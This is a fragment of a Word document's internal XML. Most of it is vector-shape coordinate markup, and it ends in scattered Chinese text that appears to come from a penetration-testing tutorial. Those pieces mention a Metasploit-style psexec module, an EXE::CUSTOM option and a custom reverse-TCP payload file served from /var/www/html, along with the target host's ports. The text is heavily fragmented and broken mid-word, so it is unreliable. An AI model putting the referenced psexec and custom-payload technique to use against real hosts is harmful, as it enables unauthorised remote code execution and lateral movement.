path="m1517,2080l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100,1517,2101,1517,2102,1517,2104,1517,2105,1517,2107,1517,2108,1517,2110,1517,2112,1517,2114,1517,2116,1517,2118,1517,2120,1517,2122,1517,2124,1517,2126,1517,2129,1517,2131,1517,2133,1517,2136,1517,2139,1517,2141,1517,2144,1517,2147,1517,2150,1517,2153,1517,2157,1517,2160,1517,2163,1517,2167,1517,2170,1517,2174,1517,2178,1517,2181,1517,2185,1517,2189,1517,2194,1517,2198,1517,2202,1517,2207,1517,2211,1517,2216,1517,2221,1517,2226,1517,2231,1517,2236,1517,2241,1517,2246,1517,2252,1517,2258,1517,2263,1517,2269,1517,2275,1517,2281,1517,2287,1517,2294,1517,2300,1517,2307,1517,2314,1517,2320,1517,2327,1517,2335,1517,2342,1517,2349,1517,2357,1517,2365,1517,2372,1517,2380,1517,2388,1517,2397,1517,2405,1517,2414,1517,2422,1517,2431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18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2430" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:2430;width:8990;height:370" coordorigin="1490,2430" coordsize="8990,37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0,10484,2440,10484,2441,10484,2441,10484,2441,10484,2441,10484,2441,10484,2441,10484,2441,10484,2442,10484,2442,10484,2442,10484,2442,10484,2443,10484,2443,10484,2443,10484,2444,10484,2444,10484,2445,10484,2445,10484,2446,10484,2446,10484,2447,10484,2448,10484,2448,10484,2449,10484,2450,10484,2451,10484,2452,10484,2452,10484,2453,10484,2454,10484,2456,10484,2457,10484,2458,10484,2459,10484,2461,10484,2462,10484,2463,10484,2465,10484,2466,10484,2468,10484,2470,10484,2472,10484,2473,10484,2475,10484,2477,10484,2479,10484,2481,10484,2484,10484,2486,10484,2488,10484,2491,10484,2493,10484,2496,10484,2499,10484,2501,10484,2504,10484,2507,10484,2510,10484,2513,10484,2517,10484,2520,10484,2523,10484,2527,10484,2530,10484,2534,10484,2538,10484,2542,10484,2546,10484,2550,10484,2554,10484,2559,10484,2563,10484,2568,10484,2572,10484,2577,10484,2582,10484,2587,10484,2592,10484,2597,10484,2603,10484,2608,10484,2614,10484,2619,10484,2625,10484,2631,10484,2637,10484,2643,10484,2650,10484,2656,10484,2663,10484,2670,10484,2676,10484,2684,10484,2691,10484,2698,10484,2705,10484,2713,10484,2721,10484,2729,10484,2737,10484,2745,10484,2753,10484,2761,10484,2770,10484,2779,10484,2788,10484,2797,10484,2806,10484,2815,10484,2815,10484,2815,10484,2815,10484,2815,10484,2815,10484,2815,10483,2815,10482,2815,10482,2815,10480,2815,10479,2815,10477,2815,10475,2815,10473,2815,10470,2815,10466,2815,10462,2815,10458,2815,10453,2815,10448,2815,10442,2815,10435,2815,10428,2815,10419,2815,10411,2815,10401,2815,10391,2815,10379,2815,10367,2815,10354,2815,10340,2815,10326,2815,10310,2815,10293,2815,10275,2815,10256,2815,10236,2815,10215,2815,10192,2815,10168,2815,10143,2815,10117,2815,10090,2815,10061,2815,10031,2815,9999,2815,9966,2815,9931,2815,9895,2815,9858,2815,9819,2815,9778,2815,9735,2815,9691,2815,9646,2815,9598,2815,9549,2815,9498,2815,9445,2815,9391,2815,9334,2815,9275,2815,9215,2815,9153,2815,9088,2815,9022,2815,8953,2815,8883,2815,8810,2815,8735,2815,8658,2815,8578,2815,8497,2815,8413,2815,8326,2815,8238,2815,8146,2815,8053,2815,7957,2815,7859,2815,7758,2815,7654,2815,7548,2815,7439,2815,7328,2815,7214,2815,7097,2815,6977,2815,6855,2815,6730,2815,6602,2815,6471,2815,6337,2815,6201,2815,6061,2815,5918,2815,5773,2815,5624,2815,5472,2815,5317,2815,5159,2815,4997,2815,4833,2815,4665,2815,4494,2815,4319,2815,4141,2815,3960,2815,3776,2815,3587,2815,3396,2815,3201,2815,3002,2815,2800,2815,2594,2815,2385,2815,2172,2815,1955,2815,1734,2815,1510,2815,1510,2815,1510,2815,1510,2815,1510,2815,1510,2815,1510,2815,1510,2815,1510,2815,1510,2815,1510,2815,1510,2815,1510,2815,1510,2815,1510,2815,1510,2815,1510,2815,1510,2815,1510,2814,1510,2814,1510,2814,1510,2814,1510,2813,1510,2813,1510,2813,1510,2812,1510,2812,1510,2812,1510,2811,1510,2811,1510,2810,1510,2809,1510,2809,1510,2808,1510,2807,1510,2807,1510,2806,1510,2805,1510,2804,1510,2803,1510,2802,1510,2801,1510,2800,1510,2799,1510,2798,1510,2796,1510,2795,1510,2794,1510,2792,1510,2791,1510,2789,1510,2788,1510,2786,1510,2784,1510,2782,1510,2780,1510,2778,1510,2776,1510,2774,1510,2772,1510,2770,1510,2767,1510,2765,1510,2762,1510,2760,1510,2757,1510,2754,1510,2751,1510,2748,1510,2745,1510,2742,1510,2739,1510,2736,1510,2732,1510,2729,1510,2725,1510,2721,1510,2718,1510,2714,1510,2710,1510,2706,1510,2701,1510,2697,1510,2693,1510,2688,1510,2683,1510,2679,1510,2674,1510,2669,1510,2664,1510,2658,1510,2653,1510,2648,1510,2642,1510,2636,1510,2630,1510,2625,1510,2618,1510,2612,1510,2606,1510,2599,1510,2593,1510,2586,1510,2579,1510,2572,1510,2565,1510,2558,1510,2550,1510,2543,1510,2535,1510,2527,1510,2519,1510,2511,1510,2503,1510,2494,1510,2486,1510,2477,1510,2468,1510,2459,1510,2450,1510,2440e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:121.500pt;width:1.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2430" coordsize="30,390">
        <v:shape style="position:absolute;left:1490;top:2430;width:30;height:390" coordorigin="1490,2430" coordsize="30,390" path="m1517,2440l1517,2440,1517,2440,1517,2440,1517,2440,1517,2440,1517,2440,1517,2440,1517,2440,1517,2440,1517,2440,1517,2440,1517,2441,1517,2441,1517,2441,1517,2441,1517,2441,1517,2441,1517,2441,1517,2442,1517,2442,1517,2442,1517,2442,1517,2443,1517,2443,1517,2443,1517,2444,1517,2444,1517,2445,1517,2445,1517,2446,1517,2446,1517,2447,1517,2448,1517,2448,1517,2449,1517,2450,1517,2451,1517,2452,1517,2452,1517,2453,1517,2454,1517,2456,1517,2457,1517,2458,1517,2459,1517,2461,1517,2462,1517,2463,1517,2465,1517,2466,1517,2468,1517,2470,1517,2472,1517,2473,1517,2475,1517,2477,1517,2479,1517,2481,1517,2484,1517,2486,1517,2488,1517,2491,1517,2493,1517,2496,1517,2499,1517,2501,1517,2504,1517,2507,1517,2510,1517,2513,1517,2517,1517,2520,1517,2523,1517,2527,1517,2530,1517,2534,1517,2538,1517,2542,1517,2546,1517,2550,1517,2554,1517,2559,1517,2563,1517,2568,1517,2572,1517,2577,1517,2582,1517,2587,1517,2592,1517,2597,1517,2603,1517,2608,1517,2614,1517,2619,1517,2625,1517,2631,1517,2637,1517,2643,1517,2650,1517,2656,1517,2663,1517,2670,1517,2676,1517,2684,1517,2691,1517,2698,1517,2705,1517,2713,1517,2721,1517,2729,1517,2737,1517,2745,1517,2753,1517,2761,1517,2770,1517,2779,1517,2788,1517,2797,1517,2806,1517,2815e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:139.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2790" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:2790;width:8990;height:370" coordorigin="1490,2790" coordsize="8990,370" path="m1510,2815l1510,2815,1510,2815,1510,2815,1510,2815,1510,2815,1510,2815,1511,2815,1512,2815,1512,2815,1514,2815,1515,2815,1517,2815,1519,2815,1521,2815,1524,2815,1528,2815,1532,2815,1536,2815,1541,2815,1546,2815,1552,2815,1559,2815,1566,2815,1575,2815,1583,2815,1593,2815,1603,2815,1615,2815,1627,2815,1640,2815,1654,2815,1668,2815,1684,2815,1701,2815,1719,2815,1738,2815,1758,2815,1780,2815,1802,2815,1826,2815,1851,2815,1877,2815,1904,2815,1933,2815,1963,2815,1995,2815,2028,2815,2063,2815,2099,2815,2136,2815,2175,2815,2216,2815,2259,2815,2303,2815,2348,2815,2396,2815,2445,2815,2496,2815,2549,2815,2604,2815,2660,2815,2719,2815,2779,2815,2841,2815,2906,2815,2972,2815,3041,2815,3112,2815,3184,2815,3259,2815,3336,2815,3416,2815,3498,2815,3582,2815,3668,2815,3757,2815,3848,2815,3941,2815,4037,2815,4136,2815,4236,2815,4340,2815,4446,2815,4555,2815,4666,2815,4780,2815,4897,2815,5017,2815,5139,2815,5264,2815,5392,2815,5523,2815,5657,2815,5793,2815,5933,2815,6076,2815,6222,2815,6370,2815,6522,2815,6677,2815,6835,2815,6997,2815,7161,2815,7329,2815,7500,2815,7675,2815,7853,2815,8034,2815,8219,2815,8407,2815,8598,2815,8793,2815,8992,2815,9194,2815,9400,2815,9609,2815,9823,2815,10039,2815,10260,2815,10484,2815,10484,2815,10484,2815,10484,2815,10484,2815,10484,2815,10484,2815,10484,2815,10484,2815,10484,2816,10484,2816,10484,2816,10484,2816,10484,2816,10484,2816,10484,2816,10484,2816,10484,2816,10484,2816,10484,2817,10484,2817,10484,2817,10484,2817,10484,2818,10484,2818,10484,2818,10484,2819,10484,2819,10484,2819,10484,2820,10484,2820,10484,2821,10484,2822,10484,2822,10484,2823,10484,2823,10484,2824,10484,2825,10484,2826,10484,2827,10484,2828,10484,2829,10484,2830,10484,2831,10484,2832,10484,2833,10484,2834,10484,2835,10484,2837,10484,2838,10484,2840,10484,2841,10484,2843,10484,2844,10484,2846,10484,2848,10484,2849,10484,2851,10484,2853,10484,2855,10484,2857,10484,2860,10484,2862,10484,2864,10484,2867,10484,2869,10484,2872,10484,2874,10484,2877,10484,2880,10484,2883,10484,2886,10484,2889,10484,2892,10484,2895,10484,2898,10484,2902,10484,2905,10484,2909,10484,2913,10484,2916,10484,2920,10484,2924,10484,2928,10484,2933,10484,2937,10484,2941,10484,2946,10484,2950,10484,2955,10484,2960,10484,2965,10484,2970,10484,2975,10484,2980,10484,2986,10484,2991,10484,2997,10484,3002,10484,3008,10484,3014,10484,3020,10484,3026,10484,3033,10484,3039,10484,3046,10484,3053,10484,3059,10484,3066,10484,3073,10484,3081,10484,3088,10484,3096,10484,3103,10484,3111,10484,3119,10484,3127,10484,3135,10484,3143,10484,3152,10484,3161,10484,3161,10484,3161,10484,3161,10484,3161,10484,3161,10484,3161,10483,3161,10482,3161,10482,3161,10480,3161,10479,3161,10477,3161,10475,3161,10473,3161,10470,3161,10466,3161,10462,3161,10458,3161,10453,3161,10448,3161,10442,3161,10435,3161,10428,3161,10419,3161,10411,3161,10401,3161,10391,3161,10379,3161,10367,3161,10354,3161,10340,3161,10326,3161,10310,3161,10293,3161,10275,3161,10256,3161,10236,3161,10215,3161,10192,3161,10168,3161,10143,3161,10117,3161,10090,3161,10061,3161,10031,3161,9999,3161,9966,3161,9931,3161,9895,3161,9858,3161,9819,3161,9778,3161,9735,3161,9691,3161,9646,3161,9598,3161,9549,3161,9498,3161,9445,3161,9391,3161,9334,3161,9275,3161,9215,3161,9153,3161,9088,3161,9022,3161,8953,3161,8883,3161,8810,3161,8735,3161,8658,3161,8578,3161,8497,3161,8413,3161,8326,3161,8238,3161,8146,3161,8053,3161,7957,3161,7859,3161,7758,3161,7654,3161,7548,3161,7439,3161,7328,3161,7214,3161,7097,3161,6977,3161,6855,3161,6730,3161,6602,3161,6471,3161,6337,3161,6201,3161,6061,3161,5918,3161,5773,3161,5624,3161,5472,3161,5317,3161,5159,3161,4997,3161,4833,3161,4665,3161,4494,3161,4319,3161,4141,3161,3960,3161,3776,3161,3587,3161,3396,3161,3201,3161,3002,3161,2800,3161,2594,3161,2385,3161,2172,3161,1955,3161,1734,3161,1510,3161,1510,3161,1510,3161,1510,3161,1510,3161,1510,3161,1510,3161,1510,3161,1510,3161,1510,3160,1510,3160,1510,3160,1510,3160,1510,3160,1510,3160,1510,3160,1510,3160,1510,3160,1510,3160,1510,3159,1510,3159,1510,3159,1510,3159,1510,3158,1510,3158,1510,3158,1510,3157,1510,3157,1510,3157,1510,3156,1510,3156,1510,3155,1510,3154,1510,3154,1510,3153,1510,3153,1510,3152,1510,3151,1510,3150,1510,3149,1510,3148,1510,3147,1510,3146,1510,3145,1510,3144,1510,3143,1510,3142,1510,3141,1510,3139,1510,3138,1510,3136,1510,3135,1510,3133,1510,3132,1510,3130,1510,3128,1510,3127,1510,3125,1510,3123,1510,3121,1510,3119,1510,3116,1510,3114,1510,3112,1510,3109,1510,3107,1510,3104,1510,3102,1510,3099,1510,3096,1510,3093,1510,3090,1510,3087,1510,3084,1510,3081,1510,3078,1510,3074,1510,3071,1510,3067,1510,3063,1510,3060,1510,3056,1510,3052,1510,3048,1510,3043,1510,3039,1510,3035,1510,3030,1510,3026,1510,3021,1510,3016,1510,3011,1510,3006,1510,3001,1510,2996,1510,2990,1510,2985,1510,2979,1510,2974,1510,2968,1510,2962,1510,2956,1510,2950,1510,2943,1510,2937,1510,2930,1510,2923,1510,2917,1510,2910,1510,2903,1510,2895,1510,2888,1510,2880,1510,2873,1510,2865,1510,2857,1510,2849,1510,2841,1510,2833,1510,2824,1510,2815e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:139.800pt;width:445.800pt;height:18.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId8" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:454.500pt;width:449.500pt;height:33.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,9090" coordsize="8990,670">
        <v:shape style="position:absolute;left:1490;top:9090;width:8990;height:670" coordorigin="1490,9090" coordsize="8990,670" path="m1510,9119l1510,9119,1510,9119,1510,9119,1510,9119,1510,9119,1510,9119,1511,9119,1512,9119,1512,9119,1514,9119,1515,9119,1517,9119,1519,9119,1521,9119,1524,9119,1528,9119,1532,9119,1536,9119,1541,9119,1546,9119,1552,9119,1559,9119,1566,9119,1575,9119,1583,9119,1593,9119,1603,9119,1615,9119,1627,9119,1640,9119,1654,9119,1668,9119,1684,9119,1701,9119,1719,9119,1738,9119,1758,9119,1780,9119,1802,9119,1826,9119,1851,9119,1877,9119,1904,9119,1933,9119,1963,9119,1995,9119,2028,9119,2063,9119,2099,9119,2136,9119,2175,9119,2216,9119,2259,9119,2303,9119,2348,9119,2396,9119,2445,9119,2496,9119,2549,9119,2604,9119,2660,9119,2719,9119,2779,9119,2841,9119,2906,9119,2972,9119,3041,9119,3112,9119,3184,9119,3259,9119,3336,9119,3416,9119,3498,9119,3582,9119,3668,9119,3757,9119,3848,9119,3941,9119,4037,9119,4136,9119,4236,9119,4340,9119,4446,9119,4555,9119,4666,9119,4780,9119,4897,9119,5017,9119,5139,9119,5264,9119,5392,9119,5523,9119,5657,9119,5793,9119,5933,9119,6076,9119,6222,9119,6370,9119,6522,9119,6677,9119,6835,9119,6997,9119,7161,9119,7329,9119,7500,9119,7675,9119,7853,9119,8034,9119,8219,9119,8407,9119,8598,9119,8793,9119,8992,9119,9194,9119,9400,9119,9609,9119,9823,9119,10039,9119,10260,9119,10484,9119,10484,9119,10484,9119,10484,9119,10484,9119,10484,9119,10484,9119,10484,9119,10484,9119,10484,9119,10484,9119,10484,9119,10484,9119,10484,9119,10484,9119,10484,9120,10484,9120,10484,9120,10484,9121,10484,9121,10484,9121,10484,9122,10484,9122,10484,9123,10484,9123,10484,9124,10484,9125,10484,9125,10484,9126,10484,9127,10484,9128,10484,9129,10484,9130,10484,9131,10484,9133,10484,9134,10484,9135,10484,9137,10484,9138,10484,9140,10484,9142,10484,9144,10484,9146,10484,9148,10484,9150,10484,9152,10484,9154,10484,9157,10484,9159,10484,9162,10484,9165,10484,9168,10484,9171,10484,9174,10484,9177,10484,9180,10484,9184,10484,9187,10484,9191,10484,9195,10484,9199,10484,9203,10484,9208,10484,9212,10484,9217,10484,9221,10484,9226,10484,9231,10484,9236,10484,9242,10484,9247,10484,9253,10484,9259,10484,9265,10484,9271,10484,9277,10484,9284,10484,9291,10484,9297,10484,9305,10484,9312,10484,9319,10484,9327,10484,9335,10484,9343,10484,9351,10484,9359,10484,9368,10484,9377,10484,9386,10484,9395,10484,9404,10484,9414,10484,9424,10484,9434,10484,9444,10484,9455,10484,9465,10484,9476,10484,9487,10484,9499,10484,9510,10484,9522,10484,9534,10484,9547,10484,9559,10484,9572,10484,9585,10484,9599,10484,9612,10484,9626,10484,9640,10484,9655,10484,9669,10484,9684,10484,9699,10484,9715,10484,9730,10484,9746,10484,9762,10484,9779,10484,9779,10484,9779,10484,9779,10484,9779,10484,9779,10484,9779,10483,9779,10482,9779,10482,9779,10480,9779,10479,9779,10477,9779,10475,9779,10473,9779,10470,9779,10466,9779,10462,9779,10458,9779,10453,9779,10448,9779,10442,9779,10435,9779,10428,9779,10419,9779,10411,9779,10401,9779,10391,9779,10379,9779,10367,9779,10354,9779,10340,9779,10326,9779,10310,9779,10293,9779,10275,9779,10256,9779,10236,9779,10215,9779,10192,9779,10168,9779,10143,9779,10117,9779,10090,9779,10061,9779,10031,9779,9999,9779,9966,9779,9931,9779,9895,9779,9858,9779,9819,9779,9778,9779,9735,9779,9691,9779,9646,9779,9598,9779,9549,9779,9498,9779,9445,9779,9391,9779,9334,9779,9275,9779,9215,9779,9153,9779,9088,9779,9022,9779,8953,9779,8883,9779,8810,9779,8735,9779,8658,9779,8578,9779,8497,9779,8413,9779,8326,9779,8238,9779,8146,9779,8053,9779,7957,9779,7859,9779,7758,9779,7654,9779,7548,9779,7439,9779,7328,9779,7214,9779,7097,9779,6977,9779,6855,9779,6730,9779,6602,9779,6471,9779,6337,9779,6201,9779,6061,9779,5918,9779,5773,9779,5624,9779,5472,9779,5317,9779,5159,9779,4997,9779,4833,9779,4665,9779,4494,9779,4319,9779,4141,9779,3960,9779,3776,9779,3587,9779,3396,9779,3201,9779,3002,9779,2800,9779,2594,9779,2385,9779,2172,9779,1955,9779,1734,9779,1510,9779,1510,9779,1510,9779,1510,9779,1510,9779,1510,9779,1510,9779,1510,9779,1510,9779,1510,9779,1510,9779,1510,9779,1510,9778,1510,9778,1510,9778,1510,9778,1510,9778,1510,9777,1510,9777,1510,9777,1510,9776,1510,9776,1510,9775,1510,9775,1510,9774,1510,9774,1510,9773,1510,9772,1510,9771,1510,9770,1510,9769,1510,9768,1510,9767,1510,9766,1510,9765,1510,9764,1510,9762,1510,9761,1510,9759,1510,9757,1510,9756,1510,9754,1510,9752,1510,9750,1510,9748,1510,9746,1510,9743,1510,9741,1510,9738,1510,9736,1510,9733,1510,9730,1510,9727,1510,9724,1510,9721,1510,9717,1510,9714,1510,9710,1510,9706,1510,9702,1510,9698,1510,9694,1510,9690,1510,9686,1510,9681,1510,9676,1510,9671,1510,9666,1510,9661,1510,9656,1510,9650,1510,9645,1510,9639,1510,9633,1510,9626,1510,9620,1510,9614,1510,9607,1510,9600,1510,9593,1510,9586,1510,9578,1510,9571,1510,9563,1510,9555,1510,9547,1510,9538,1510,9530,1510,9521,1510,9512,1510,9503,1510,9493,1510,9484,1510,9474,1510,9464,1510,9453,1510,9443,1510,9432,1510,9421,1510,9410,1510,9399,1510,9387,1510,9375,1510,9363,1510,9351,1510,9338,1510,9325,1510,9312,1510,9299,1510,9285,1510,9271,1510,9257,1510,9243,1510,9228,1510,9214,1510,9198,1510,9183,1510,9167,1510,9151,1510,9135,1510,9119e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:487.500pt;width:449.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,9750" coordsize="8990,390">
        <v:shape style="position:absolute;left:1490;top:9750;width:8990;height:390" coordorigin="1490,9750" coordsize="8990,390" path="m1510,9779l1510,9779,1510,9779,1510,9779,1510,9779,1510,9779,1510,9779,1511,9779,1512,9779,1512,9779,1514,9779,1515,9779,1517,9779,1519,9779,1521,9779,1524,9779,1528,9779,1532,9779,1536,9779,1541,9779,1546,9779,1552,9779,1559,9779,1566,9779,1575,9779,1583,9779,1593,9779,1603,9779,1615,9779,1627,9779,1640,9779,1654,9779,1668,9779,1684,9779,1701,9779,1719,9779,1738,9779,1758,9779,1780,9779,1802,9779,1826,9779,1851,9779,1877,9779,1904,9779,1933,9779,1963,9779,1995,9779,2028,9779,2063,9779,2099,9779,2136,9779,2175,9779,2216,9779,2259,9779,2303,9779,2348,9779,2396,9779,2445,9779,2496,9779,2549,9779,2604,9779,2660,9779,2719,9779,2779,9779,2841,9779,2906,9779,2972,9779,3041,9779,3112,9779,3184,9779,3259,9779,3336,9779,3416,9779,3498,9779,3582,9779,3668,9779,3757,9779,3848,9779,3941,9779,4037,9779,4136,9779,4236,9779,4340,9779,4446,9779,4555,9779,4666,9779,4780,9779,4897,9779,5017,9779,5139,9779,5264,9779,5392,9779,5523,9779,5657,9779,5793,9779,5933,9779,6076,9779,6222,9779,6370,9779,6522,9779,6677,9779,6835,9779,6997,9779,7161,9779,7329,9779,7500,9779,7675,9779,7853,9779,8034,9779,8219,9779,8407,9779,8598,9779,8793,9779,8992,9779,9194,9779,9400,9779,9609,9779,9823,9779,10039,9779,10260,9779,10484,9779,10484,9779,10484,9779,10484,9779,10484,9779,10484,9779,10484,9779,10484,9779,10484,9779,10484,9779,10484,9779,10484,9779,10484,9779,10484,9779,10484,9779,10484,9780,10484,9780,10484,9780,10484,9780,10484,9780,10484,9780,10484,9781,10484,9781,10484,9781,10484,9782,10484,9782,10484,9782,10484,9783,10484,9783,10484,9784,10484,9784,10484,9785,10484,9786,10484,9786,10484,9787,10484,9788,10484,9788,10484,9789,10484,9790,10484,9791,10484,9792,10484,9793,10484,9794,10484,9795,10484,9797,10484,9798,10484,9799,10484,9801,10484,9802,10484,9804,10484,9805,10484,9807,10484,9808,10484,9810,10484,9812,10484,9814,10484,9816,10484,9818,10484,9820,10484,9822,10484,9825,10484,9827,10484,9829,10484,9832,10484,9835,10484,9837,10484,9840,10484,9843,10484,9846,10484,9849,10484,9852,10484,9855,10484,9859,10484,9862,10484,9866,10484,9869,10484,9873,10484,9877,10484,9881,10484,9885,10484,9889,10484,9893,10484,9897,10484,9902,10484,9906,10484,9911,10484,9916,10484,9921,10484,9926,10484,9931,10484,9936,10484,9941,10484,9947,10484,9952,10484,9958,10484,9964,10484,9970,10484,9976,10484,9982,10484,9988,10484,9995,10484,10002,10484,10008,10484,10015,10484,10022,10484,10029,10484,10037,10484,10044,10484,10052,10484,10059,10484,10067,10484,10075,10484,10083,10484,10092,10484,10100,10484,10109,10484,10118,10484,10126,10484,10136,10484,10145,10484,10154,10484,10154,10484,10154,10484,10154,10484,10154,10484,10154,10484,10154,10483,10154,10482,10154,10482,10154,10480,10154,10479,10154,10477,10154,10475,10154,10473,10154,10470,10154,10466,10154,10462,10154,10458,10154,10453,10154,10448,10154,10442,10154,10435,10154,10428,10154,10419,10154,10411,10154,10401,10154,10391,10154,10379,10154,10367,10154,10354,10154,10340,10154,10326,10154,10310,10154,10293,10154,10275,10154,10256,10154,10236,10154,10215,10154,10192,10154,10168,10154,10143,10154,10117,10154,10090,10154,10061,10154,10031,10154,9999,10154,9966,10154,9931,10154,9895,10154,9858,10154,9819,10154,9778,10154,9735,10154,9691,10154,9646,10154,9598,10154,9549,10154,9498,10154,9445,10154,9391,10154,9334,10154,9275,10154,9215,10154,9153,10154,9088,10154,9022,10154,8953,10154,8883,10154,8810,10154,8735,10154,8658,10154,8578,10154,8497,10154,8413,10154,8326,10154,8238,10154,8146,10154,8053,10154,7957,10154,7859,10154,7758,10154,7654,10154,7548,10154,7439,10154,7328,10154,7214,10154,7097,10154,6977,10154,6855,10154,6730,10154,6602,10154,6471,10154,6337,10154,6201,10154,6061,10154,5918,10154,5773,10154,5624,10154,5472,10154,5317,10154,5159,10154,4997,10154,4833,10154,4665,10154,4494,10154,4319,10154,4141,10154,3960,10154,3776,10154,3587,10154,3396,10154,3201,10154,3002,10154,2800,10154,2594,10154,2385,10154,2172,10154,1955,10154,1734,10154,1510,10154,1510,10154,1510,10154,1510,10154,1510,10154,1510,10154,1510,10154,1510,10154,1510,10154,1510,10154,1510,10154,1510,10154,1510,10154,1510,10154,1510,10154,1510,10154,1510,10153,1510,10153,1510,10153,1510,10153,1510,10153,1510,10152,1510,10152,1510,10152,1510,10151,1510,10151,1510,10151,1510,10150,1510,10150,1510,10149,1510,10149,1510,10148,1510,10147,1510,10147,1510,10146,1510,10145,1510,10145,1510,10144,1510,10143,1510,10142,1510,10141,1510,10140,1510,10139,1510,10138,1510,10136,1510,10135,1510,10134,1510,10132,1510,10131,1510,10129,1510,10128,1510,10126,1510,10125,1510,10123,1510,10121,1510,10119,1510,10117,1510,10115,1510,10113,1510,10111,1510,10108,1510,10106,1510,10104,1510,10101,1510,10098,1510,10096,1510,10093,1510,10090,1510,10087,1510,10084,1510,10081,1510,10078,1510,10074,1510,10071,1510,10068,1510,10064,1510,10060,1510,10056,1510,10052,1510,10048,1510,10044,1510,10040,1510,10036,1510,10031,1510,10027,1510,10022,1510,10017,1510,10013,1510,10008,1510,10002,1510,9997,1510,9992,1510,9986,1510,9981,1510,9975,1510,9969,1510,9963,1510,9957,1510,9951,1510,9945,1510,9938,1510,9931,1510,9925,1510,9918,1510,9911,1510,9904,1510,9896,1510,9889,1510,9881,1510,9874,1510,9866,1510,9858,1510,9850,1510,9841,1510,9833,1510,9824,1510,9816,1510,9807,1510,9798,1510,9788,1510,9779e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:506.500pt;width:449.500pt;height:1.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,10130" coordsize="8990,30">
        <v:shape style="position:absolute;left:1490;top:10130;width:8990;height:30" coordorigin="1490,10130" coordsize="8990,30" path="m1510,10147l1510,10147,1510,10147,1510,10147,1510,10147,1510,10147,1510,10147,1511,10147,1512,10147,1512,10147,1514,10147,1515,10147,1517,10147,1519,10147,1521,10147,1524,10147,1528,10147,1532,10147,1536,10147,1541,10147,1546,10147,1552,10147,1559,10147,1566,10147,1575,10147,1583,10147,1593,10147,1603,10147,1615,10147,1627,10147,1640,10147,1654,10147,1668,10147,1684,10147,1701,10147,1719,10147,1738,10147,1758,10147,1780,10147,1802,10147,1826,10147,1851,10147,1877,10147,1904,10147,1933,10147,1963,10147,1995,10147,2028,10147,2063,10147,2099,10147,2136,10147,2175,10147,2216,10147,2259,10147,2303,10147,2348,10147,2396,10147,2445,10147,2496,10147,2549,10147,2604,10147,2660,10147,2719,10147,2779,10147,2841,10147,2906,10147,2972,10147,3041,10147,3112,10147,3184,10147,3259,10147,3336,10147,3416,10147,3498,10147,3582,10147,3668,10147,3757,10147,3848,10147,3941,10147,4037,10147,4136,10147,4236,10147,4340,10147,4446,10147,4555,10147,4666,10147,4780,10147,4897,10147,5017,10147,5139,10147,5264,10147,5392,10147,5523,10147,5657,10147,5793,10147,5933,10147,6076,10147,6222,10147,6370,10147,6522,10147,6677,10147,6835,10147,6997,10147,7161,10147,7329,10147,7500,10147,7675,10147,7853,10147,8034,10147,8219,10147,8407,10147,8598,10147,8793,10147,8992,10147,9194,10147,9400,10147,9609,10147,9823,10147,10039,10147,10260,10147,10484,10147e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:454.800pt;width:445.800pt;height:53.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId9" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:177.600pt;width:467.400pt;height:216.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId10" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:527.400pt;width:440.400pt;height:46.799pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId11" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:635.400pt;width:444.600pt;height:57.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830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Automatic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32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需</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>设置一非，常用选项：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psexec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EXE::CUSTOM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www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html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bin_tc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p_x86_53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exe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EXE::CUSTOM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var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www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html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bin_tcp_x86_53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机当前端口如下：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攻</w:t>
      </w:r>
      <w:r>
        <w:rPr>
